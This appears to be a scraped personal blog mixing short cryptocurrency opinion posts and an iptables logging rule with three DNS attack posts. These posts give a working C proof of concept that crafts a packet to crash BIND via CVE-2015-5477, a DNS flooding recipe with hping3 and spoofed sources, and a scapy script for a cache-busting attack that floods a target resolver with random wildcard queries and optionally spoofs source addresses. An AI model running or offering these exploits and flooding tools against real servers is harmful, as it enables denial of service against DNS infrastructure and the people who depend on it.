Saturday, 11 June 2016
tuxexchange.com A new cryptocurrency exchange
tuxexchange.com is a new cryptocurrency exchange that offers spot trading in most popular cryptocurrencies. Check it out www.tuxexchange.com
Tuesday, 4 August 2015
CVE-2015-5477 - DNS bind TKEY query handling DoS Proof of concept exploit
Here is a quick PoC exploit for the TKEY bind vulnerability.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // CVE-2015-5477 - bind TKEY query handling DoS Proof of concept | |
| // (sipher@utensil)(~/tkeyd)$ rm dns.txt | |
| // (sipher@utensil)(~/tkeyd)$ gcc tkeyd.c -o tkeyd | |
| // (sipher@utensil)(~/tkeyd)$ ./tkeyd | |
| // (sipher@utensil)(~/tkeyd)$ nc -u 127.0.0.1 53 < dns.txt | |
| #include <stdio.h> | |
| int main() { | |
| FILE *fp; | |
| fp=fopen("dns.txt", "w+"); | |
| fprintf(fp,"%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c",0x2d,0xbc,0x01,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x01,0x06,0x67,0x6f,0x6f,0x67,0x6c,0x65,0x03,0x63,0x6f,0x6d,0x00,0x00,0xf9,0x00,0x01,0x06,0x67,0x6f,0x6f,0x67,0x6c,0x65,0x03,0x63,0x6f,0x6d,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x06,0x67,0x6f,0x6f,0x67,0x6c,0x65,0x03,0x63,0x6f,0x6d,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00); | |
| fclose(fp); | |
| } | |
Friday, 17 April 2015
DNS Stress testing with hping3
1. Compile our program to generate the DNS payload
(sipher@utensil)(~/dnsstress)$ gcc gr2.c -o gr2
2. Generate DNS payload
(sipher@utensil)(~/dnsstress)$ ./gr2
(sipher@utensil)(~/dnsstress)$ hexdump -C dns.txt
00000000 24 1a 01 00 00 01 00 00 00 00 00 00 06 67 6f 6f |$............goo|
00000010 67 6c 65 03 63 6f 6d 00 00 01 00 01 |gle.com.....|
0000001c
3. Get the size of the request (Important for passing to hping3 -d paramater)
(sipher@utensil)(~/dnsstress)$ ls -lah |grep dns.txt
-rw-rw-r-- 1 striemer striemer 28 Apr 17 10:30 dns.txt
(sipher@utensil)(~/dnsstress)$
4. Fire!!
use --flood if you're brave. Use --rand-source to test state tables.
(sipher@utensil)(~/dnsstress)$ sudo hping3 localhost --udp -V -p 53 --file /home/sipher/dnsstress/dns.txt -d 28 --fast
Alternate way to deliver the packets...
NOTE: Won't be as fast since it's not using raw sockets and it's waiting for reply.
(sipher@utensil)(~/dnsstress)$ nc -u localhost 53 < dns.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Generate DNS request for injection directly on the wire (Homebrew stress test) | |
| // | |
| // Example packet (tcpdump -lnx -i eth2 port 53): | |
| // | |
| // 19:21:35.494916 IP 3.1.33.7.46035 > localhost.53: 65222+ A? google.com. (28) | |
| // 0x0000: 4500 0038 b087 0000 4011 26ae c0a8 c845 | |
| // 0x0010: 18e2 01b0 b3d3 0035 0024 a3b5 fec6 0100 | |
| // 0x0020: 0001 0000 0000 0000 0667 6f6f 676c 6503 | |
| // 0x0030: 636f 6d00 0001 0001 | |
| // | |
| // Packet break down | |
| // | |
| // Domain Name System (query) | |
| // [Response In: 1852] | |
| // Transaction ID: 0x241a | |
| // Flags: 0x0100 (Standard query) | |
| // 0... .... .... .... = Response: Message is a query | |
| // .000 0... .... .... = Opcode: Standard query (0) | |
| // .... ..0. .... .... = Truncated: Message is not truncated | |
| // .... ...1 .... .... = Recursion desired: Do query recursively | |
| // .... .... .0.. .... = Z: reserved (0) | |
| // .... .... ...0 .... = Non-authenticated data OK: Non-authenticated data is unacceptable | |
| // Questions: 1 | |
| // Answer RRs: 0 | |
| // Authority RRs: 0 | |
| // Additional RRs: 0 | |
| // Queries | |
| // google.com: type A, class IN | |
| // Name: google.com | |
| // Type: A (Host address) | |
| // Class: IN (0x0001) | |
| // | |
| // How to use: | |
| // ----------- | |
| // 1. Compile our program to generate the DNS payload | |
| // | |
| // (sipher@utensil)(~/dnsstress)$ gcc gr2.c -o gr2 | |
| // | |
| // 2. Generate DNS payload | |
| // | |
| // (sipher@utensil)(~/dnsstress)$ ./gr2 | |
| // (sipher@utensil)(~/dnsstress)$ hexdump -C dns.txt | |
| // 00000000 24 1a 01 00 00 01 00 00 00 00 00 00 06 67 6f 6f |$............goo| | |
| // 00000010 67 6c 65 03 63 6f 6d 00 00 01 00 01 |gle.com.....| | |
| // 0000001c | |
| // | |
| // 3. Get the size of the request (Important for passing to hping3 -d paramater) | |
| // | |
| // (sipher@utensil)(~/dnsstress)$ ls -lah |grep dns.txt | |
| // -rw-rw-r-- 1 striemer striemer 28 Apr 17 10:30 dns.txt | |
| // (sipher@utensil)(~/dnsstress)$ | |
| // | |
| // 4. Fire!! | |
| // use --flood if you're brave. Use --rand-source to test state tables. | |
| // (sipher@utensil)(~/dnsstress)$ sudo hping3 localhost --udp -V -p 53 --file /home/sipher/dnsstress/dns.txt -d 28 --fast | |
| // | |
| // Alternate way to deliver the packets... | |
| // | |
| // NOTE: Won't be as fast since it's not using raw sockets and it's waiting for reply. | |
| // | |
| // (sipher@utensil)(~/dnsstress)$ nc -u localhost 53 < dns.txt | |
| #include <stdio.h> | |
| int main() { | |
| FILE *fp; | |
| fp=fopen("dns.txt", "w+"); | |
| fprintf(fp,"%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c",0x24,0x1a,0x01,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x06,0x67,0x6f,0x6f,0x67,0x6c,0x65,0x03,0x63,0x6f,0x6d,0x00,0x00,0x01,0x00,0x01); | |
| fclose(fp); | |
| //char* buf; | |
| //int i; | |
| // Transaction ID | |
| //buf[i++] = 0x24; | |
| //buf[i++] = 0x1a; | |
| // Standard Query | |
| //buf[i++] = 0x01; | |
| //buf[i++] = 0x00; | |
| // 0... .... .... .... = Response: Message is a query | |
| // .000 0... .... .... = Opcode: Standard query (0) | |
| // .... ..0. .... .... = Truncated: Message is not truncated | |
| // .... ...1 .... .... = Recursion desired: Do query recursively | |
| // .... .... .0.. .... = Z: reserved (0) | |
| // .... .... ...0 .... = Non-authenticated data OK: Non-authenticated data is unacceptable | |
| //buf[i++] = 0x00; | |
| //buf[i++] = 0x01; | |
| //buf[i++] = 0x00; | |
| //buf[i++] = 0x00; | |
| //buf[i++] = 0x00; | |
| //buf[i++] = 0x00; | |
| //buf[i++] = 0x00; | |
| //buf[i++] = 0x00; | |
| //buf[i++] = 0x06; | |
| // g = 67 | |
| // o = 6f | |
| // o = 6f | |
| // g = 67 | |
| // l = 6c | |
| // e = 65 | |
| // . = 03 (END OF TEXT | |
| // c = 63 | |
| // o = 6f | |
| // m = 6d | |
| // Let's try changing the query name to whatever we want. | |
| // strcpy((buf + i), hostname); | |
| // i = i + strlen(hostname); | |
| // google.com | |
| //buf[i++] = 0x67; | |
| //buf[i++] = 0x6f; | |
| //buf[i++] = 0x6f; | |
| //buf[i++] = 0x67; | |
| //buf[i++] = 0x6c; | |
| //buf[i++] = 0x65; | |
| //buf[i++] = 0x03; | |
| //buf[i++] = 0x63; | |
| //buf[i++] = 0x6f; | |
| //buf[i++] = 0x6d; | |
| // Type A and Class IN | |
| //buf[i++] = 0x00; | |
| //buf[i++] = 0x00; | |
| //buf[i++] = 0x01; | |
| //buf[i++] = 0x00; | |
| //buf[i++] = 0x01; | |
| } |
Friday, 2 January 2015
DNS Cache busting
DNS Cache busting is a very simple attack against a caching DNS server. All you need is a domain which is confiured to answer for a wild card (Example: *.domain.com,asd.domain.com etc.).
This attack is being used in the wild.
UPDATE: ISC has since introduced some features to bind to mitigate this attack.
https://kb.isc.org/article/AA-01178/0/Recursive-Client-Rate-limiting-in-BIND-9.9-Subscription-Version.html
This attack is being used in the wild.
UPDATE: ISC has since introduced some features to bind to mitigate this attack.
https://kb.isc.org/article/AA-01178/0/Recursive-Client-Rate-limiting-in-BIND-9.9-Subscription-Version.html
fetches-per-zone The maximum number of simultaneous iterative queries to any one domain that the server will permit before blocking new queries for data in or beneath that zone. This value should reflect how many fetches would normally be sent to any one zone in the time it would take to resolve them. It should be smaller than recursive-clients. When many clients simultaneously query for the same name and type, the clients will all be attached to the same fetch, up to the max-clients-per-query limit, and only one iterative query will be sent. However, when clients are simultaneously querying for different names or types, multiple queries will be sent and max-clients-per-query is not effective as a limit.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # DNS wildcard attack POC (cache busting?) | |
| # | |
| # DNS Server pwnage from a single host. This tool will clobber a DNS cache server. | |
| # | |
| # Theory | |
| # Force a cache server to cache records for a DNS zone that will answer for non-existant domain names.. http://en.wikipedia.org/wiki/Wildcard_DNS_record | |
| # | |
| # Example: *.godaddy.com | |
| # | |
| # Running on Ubuntu | |
| # apt-get install python-scapy | |
| # | |
| # Make sure to drop ICMP Unreachable if not spoofing. Since we are not using the system connect() functions the kernel will ICMP unreach to victim (which may or may not impact the results of the attack). | |
| # | |
| # iptables -I OUTPUT -p icmp --icmp-type destination-unreachable -j DROP | |
| # | |
| # As root | |
| # Example usage: python dnsb.py ns1.target.com 3.1.33.7 godaddy.com 10000 0 | |
| # | |
| # BIND 9 default max cache ttl is 7 days. | |
| # max-cache-ttl sets the maximum time (in seconds) for which the server will cache positive answers (negative answers NXDOMAIN is defined by max-ncache-ttl). The default is one week (7 days). This statement may be used in view or a global options clause. | |
| from scapy.all import * | |
| import random | |
| import string | |
| import sys | |
| # inet_ntoa | |
| import socket | |
| import struct | |
| # Maximum subdomain lenght..consumes more memory in the cache. | |
| # This subdivision can go down to 127 levels deep, and each DNS label can contain up to 63 characters, as long as the whole domain name does not exceed a total length of 255 characters. | |
| def randomain(size=220, chars=string.letters + string.digits): | |
| return ''.join(random.choice(chars) for _ in range(size)) | |
| if(os.getuid())!=0: | |
| print "ERROR: Must be root to use raw sockets." | |
| sys.exit(1) | |
| if (len(sys.argv) != 6): | |
| print "DNS Cache Busting attack Proof of concept" | |
| print "Usage: " + sys.argv[0] + " < target > < source > < wild card domain > < number of packets > < spoof 0 = off / 1 = on >" | |
| quit() | |
| target=sys.argv[1] | |
| source=sys.argv[2] | |
| dlist=sys.argv[3] | |
| num=int(sys.argv[4]) | |
| spoof=int(sys.argv[5]) | |
| # get local IP excluding loopback. A bit misleading, google's cache plays no part in the attack. | |
| myip=([(s.connect(('8.8.8.8', 80)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]) | |
| print "Sending packets to: "+target | |
| for x in range(0, num): | |
| # If we want to spoof? | |
| if spoof == 1: | |
| randsource=socket.inet_ntoa(struct.pack('>I', random.randint(1, 0xffffffff))) | |
| myip=randsource | |
| print myip | |
| # generate random sub domain | |
| rdom=randomain() | |
| rd= rdom + '.' + dlist | |
| # send out packets :) | |
| req = IP(dst=target,src=myip)/UDP(sport=random.randint(1025, 65000), dport=53)/DNS(id=random.randint(1025, 65000), opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0,qd=DNSQR(qname=rd, qtype=1, qclass=1),an=0,ns=0,ar=0) | |
| send(req) | |
Apple Pay...Just another way to use a credit card
Is Apple pay really that revolutionary? What does this mean for the world of crypto-currency?
My opinion is that Apple Pay doesn't address any of the features delivered by Bitcoin (and similar altcoins). For example, the decentralized ledger which automates accounting or the ability to transfer funds anywhere in the world with limited infrastructure. The list goes on. Apply Pay just another way to use a credit card in a brick and motar market.
My opinion is that Apple Pay doesn't address any of the features delivered by Bitcoin (and similar altcoins). For example, the decentralized ledger which automates accounting or the ability to transfer funds anywhere in the world with limited infrastructure. The list goes on. Apply Pay just another way to use a credit card in a brick and motar market.
Wednesday, 31 December 2014
iptables log traffic to port
Here is a rule to log traffic to SSH.
iptables -A INPUT -p tcp --dport 22 -j LOG
Tuesday, 30 December 2014
Crypto shake up
XRP, Stellar, Paycoin, Counterparty? WTF is going on in the crypto world? Is bitcoin in trouble?
Buy EVERYTHING!!?
Buy EVERYTHING!!?
Subscribe to:
Posts (Atom)